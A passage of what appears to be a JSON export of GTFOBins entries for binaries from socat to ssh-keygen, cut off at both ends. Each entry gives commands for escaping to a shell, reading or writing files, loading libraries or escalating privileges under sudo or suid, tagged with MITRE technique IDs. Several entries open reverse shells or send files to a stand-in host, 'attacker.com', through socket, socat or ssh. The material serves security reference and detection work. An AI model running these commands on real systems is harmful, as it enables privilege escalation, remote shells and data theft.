exec:/bin/sh,pty,ctty,raw,echo=0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"socat - 'exec:/bin/sh -p,pty,ctty,raw,echo=0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"socat - exec:/bin/sh,pty,ctty,raw,echo=0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:upload:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:upload:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:upload:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"socat -u file:/path/to/input-file tcp-connect:attacker.com:12345","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socket:bind-shell:0:sudo","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:bind-shell:0:suid","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:bind-shell:0:unprivileged","toolId":"gtfo:socket","toolName":"socket","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"socket -svp '/bin/sh -i' 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:reverse-shell:0:sudo","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:reverse-shell:0:suid","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:socket:reverse-shell:0:unprivileged","toolId":"gtfo:socket","toolName":"socket","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"socket -qvp '/bin/sh -i' attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socket/"]},{"id":"gtfo:soelim:file-read:0:sudo","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/soelim/"]},{"id":"gtfo:soelim:file-read:0:suid","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/soelim/"]},{"id":"gtfo:soelim:file-read:0:unprivileged","toolId":"gtfo:soelim","toolName":"soelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"soelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/soelim/"]},{"id":"gtfo:softlimit:shell:0:sudo","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"softlimit /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/softlimit/"]},{"id":"gtfo:softlimit:shell:0:suid","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"softlimit /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/softlimit/"]},{"id":"gtfo:softlimit:shell:0:unprivileged","toolId":"gtfo:softlimit","toolName":"softlimit","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"softlimit /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/softlimit/"]},{"id":"gtfo:sort:file-read:0:sudo","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-read:0:suid","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-read:0:unprivileged","toolId":"gtfo:sort","toolName":"sort","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sort -m /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-write:0:sudo","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-write:0:suid","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:sort:file-write:0:unprivileged","toolId":"gtfo:sort","toolName":"sort","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | sort -m -o /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sort/"]},{"id":"gtfo:split:file-read:0:sudo","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-read:0:suid","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-read:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix\ncat prefixaasuffix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-write:0:sudo","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-write:0:suid","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:file-write:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"split -b 999 --additional-suffix suffix /path/to/input-file prefix","description":"This copies the input file in the current working directory in a file named `prefixaasuffix`, just make sure to pick a value big enough, instead of `999`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:shell:0:sudo","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:shell:0:suid","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:split:shell:0:unprivileged","toolId":"gtfo:split","toolName":"split","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"split --filter='/bin/sh -i 0<&2 1>&2' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/split/"]},{"id":"gtfo:sqlite3:file-read:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-read:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-read:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sqlite3 <<EOF\nCREATE TABLE x(x TEXT);\n.import /path/to/input-file x\nSELECT * FROM x;\nEOF","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-write:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-write:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:file-write:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"sqlite3 /dev/null -cmd '.output /path/to/output-file' 'select \"DATA\";'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:shell:0:sudo","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:shell:0:suid","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlite3:shell:0:unprivileged","toolId":"gtfo:sqlite3","toolName":"sqlite3","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sqlite3 /dev/null '.shell /bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlite3/"]},{"id":"gtfo:sqlmap:inherit:0:sudo","toolId":"gtfo:sqlmap","toolName":"sqlmap","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"sqlmap -u 127.0.0.1 --eval='...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sqlmap/"]},{"id":"gtfo:sqlmap:inherit:0:unprivileged","toolId":"gtfo:sqlmap","toolName":"sqlmap","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"sqlmap -u 127.0.0.1 --eval='...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sqlmap/"]},{"id":"gtfo:ss:file-read:0:sudo","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ss/"]},{"id":"gtfo:ss:file-read:0:suid","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ss/"]},{"id":"gtfo:ss:file-read:0:unprivileged","toolId":"gtfo:ss","toolName":"ss","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ss -a -F /path/to/input-file","description":"The file content is actually parsed so only a part of the first line is returned as a part of an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ss/"]},{"id":"gtfo:ssh:download:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:download:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:download:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"ssh user@attacker.com 'cat /path/to/input-file\"","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:file-read:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:file-read:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:file-read:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh -F /path/to/input-file x","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh localhost /bin/sh","description":"Reconnecting may help bypassing restricted shells.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:1:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:1:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh -o ProxyCommand=';/bin/sh 0<&2 1>&2' x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:2:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost","description":"Spawn the shell on the client, but still requires a successful remote connection.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:shell:2:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh localhost","description":"Spawn the shell on the client, but still requires a successful remote connection.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:upload:0:sudo","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:upload:0:suid","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh:upload:0:unprivileged","toolId":"gtfo:ssh","toolName":"ssh","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"echo DATA | ssh user@attacker.com 'cat >/path/to/output-file\"","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh/"]},{"id":"gtfo:ssh-agent:shell:0:sudo","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"]},{"id":"gtfo:ssh-agent:shell:0:suid","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"]},{"id":"gtfo:ssh-agent:shell:0:unprivileged","toolId":"gtfo:ssh-agent","toolName":"ssh-agent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ssh-agent /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-agent/"]},{"id":"gtfo:ssh-copy-id:file-read:0:sudo","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com","description":"The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"]},{"id":"gtfo:ssh-copy-id:file-read:0:unprivileged","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ssh-copy-id -f -i /path/to/input-file.pub user@attacker.com","description":"The input file must have the `.pub` file extension. The file will be copied to `~/.ssh/authorized_keys`, otherwise the `-t /path/to/output-file` option can be used.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"]},{"id":"gtfo:ssh-copy-id:file-write:0:sudo","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host","description":"The input file must have the `.pub` file extension.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"]},{"id":"gtfo:ssh-copy-id:file-write:0:unprivileged","toolId":"gtfo:ssh-copy-id","toolName":"ssh-copy-id","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ssh-copy-id -f -i /path/to/input-file.pub -t /path/to/output-file user@host","description":"The input file must have the `.pub` file extension.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-copy-id/"]},{"id":"gtfo:ssh-keygen:library-load:0:sudo","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"]},{"id":"gtfo:ssh-keygen:library-load:0:suid","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` function.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ssh-keygen/"]},{"id":"gtfo:ssh-keygen:library-load:0:unprivileged","toolId":"gtfo:ssh-keygen","toolName":"ssh-keygen","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ssh-keygen -D /path/to/lib.so","description":"The shared library must contain the `void C_GetFunctionList() {}` 